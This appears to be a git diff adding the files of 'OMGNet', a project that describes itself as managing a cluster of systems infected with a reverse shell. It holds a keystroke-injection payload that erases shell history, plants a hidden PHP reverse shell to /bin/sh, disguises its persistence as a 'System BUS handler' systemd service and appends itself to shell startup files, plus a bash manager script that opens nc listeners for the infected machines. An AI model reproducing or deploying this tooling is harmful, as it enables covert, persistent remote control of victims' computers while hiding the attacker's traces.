||||||
|
echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid Port Number \"$useP\"."
|
||||||
|
fi
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e0m[Invalid choice \"$ent\"."
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
connect () {
|
||||||
|
echo
|
||||||
|
list
|
||||||
|
echo
|
||||||
|
read -p "Enter Target number to connect: " cho
|
||||||
|
one=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | grep -E -o "([0-9]{1,3}[\.]){3}[0-9]{1,3}")
|
||||||
|
two=$(sed ""$cho\!d"" ~/.config/OMGNet/OMGNet.db | awk '{print $ 3}')
|
||||||
|
read -p "Do you want to listen on local address(y|n): " src
|
||||||
|
if [ "$src" = n ]
|
||||||
|
then
|
||||||
|
echo -e "Listning on IP address \"$one\" and Port number \"$two\"...."
|
||||||
|
nc -lv -s $one -p $two
|
||||||
|
elif [ "$src" = y ]
|
||||||
|
then
|
||||||
|
echo -e "Listning on Port number \"$two\"...."
|
||||||
|
nc -nvlp $two
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNetManager:Error:\e[0mInvalid choice \"$src\"."
|
||||||
|
fi
|
||||||
|
}
|
||||||
|
if [ "$ch" = 1 ]
|
||||||
|
then
|
||||||
|
connect
|
||||||
|
elif [ "$ch" = 2 ]
|
||||||
|
then
|
||||||
|
create
|
||||||
|
elif [ "$ch" = 3 ]
|
||||||
|
then
|
||||||
|
list
|
||||||
|
elif [ "$ch" = 4 ]
|
||||||
|
then
|
||||||
|
remove
|
||||||
|
elif [ "$ch" = 5 ]
|
||||||
|
then
|
||||||
|
update
|
||||||
|
else
|
||||||
|
echo -e "\033[0;31m\e[1mOMGNet:Error:\e[0mInvalid choice \"$ch\"."
|
||||||
|
fi
|
|
@ -0,0 +1,28 @@
|
||||||
|
# OMGNet
|
||||||
|
|
||||||
|
## About:
|
||||||
|
* Title: OMGNet
|
||||||
|
* Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
|
||||||
|
* AUTHOR: drapl0n
|
||||||
|
* Version: 1.0
|
||||||
|
* Category: Remote Access
|
||||||
|
* Target: Unix-like operating systems with systemd.
|
||||||
|
* Attackmodes: HID
|
||||||
|
|
||||||
|
## OMGNet is cluster of systems infected with persistentReverseOMG which are manged by OMGNetManager.
|
||||||
|
|
||||||
|
### Functions:
|
||||||
|
* Connect to target.
|
||||||
|
* Create new target.
|
||||||
|
* List targets.
|
||||||
|
* Remove target.
|
||||||
|
* Update target.
|
||||||
|
|
||||||
|
### Installation:
|
||||||
|
Use ``install.sh`` script to install OMGNetManager.
|
||||||
|
|
||||||
|
### Usage:
|
||||||
|
Use command ``OMGNetManager``.
|
||||||
|
|
||||||
|
#### Support me if you like my work:
|
||||||
|
* https://twitter.com/drapl0n
|
|
@ -0,0 +1,5 @@
|
||||||
|
mkdir ~/.config/OMGNet
|
||||||
|
mv payload ~/.config/OMGNet/
|
||||||
|
touch ~/.config/OMGNet/OMGNet.db
|
||||||
|
chmod +x OMGNetManager
|
||||||
|
sudo mv OMGNetManager /bin/
|
|
@ -0,0 +1,50 @@
|
||||||
|
REM Title: OMGNet
|
||||||
|
REM Description: Create, Encode, Inject, Spread your OMGNet and manage it using OMGNetManager.
|
||||||
|
REM AUTHOR: drapl0n
|
||||||
|
REM Version: 1.0
|
||||||
|
REM Category: Remote Access
|
||||||
|
REM Target: Unix-like operating systems with systemd.
|
||||||
|
REM Attackmodes: HID
|
||||||
|
|
||||||
|
REM [keeping tracks clear]
|
||||||
|
DELAY 500
|
||||||
|
CTRL-ALT t
|
||||||
|
DELAY 400
|
||||||
|
STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [creating reverse shell]
|
||||||
|
STRING mkdir /var/tmp/.system
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/bin/sh -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING chmod +x /var/tmp/.system/systemBus
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [creating non-root systemd service]
|
||||||
|
STRING mkdir -p ~/.config/systemd/user
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
STRING echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [enabling service]
|
||||||
|
STRING systemctl --user daemon-reload
|
||||||
|
ENTER
|
||||||
|
STRING systemctl --user enable --now systemBUS.service
|
||||||
|
ENTER
|
||||||
|
STRING systemctl --user start --now systemBUS.service
|
||||||
|
ENTER
|
||||||
|
DELAY 100
|
||||||
|
|
||||||
|
REM [autostarting service on terminal/shell launch]
|
||||||
|
STRING echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user enable --now systemBUS.service >> ~/.bashrc\nfi\n\n" > ~/tmmmp
|
||||||
|
ENTER
|
||||||
|
DELAY 50
|
||||||
|
STRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
|
||||||
|
ENTER
|
Loading…
Reference in New Issue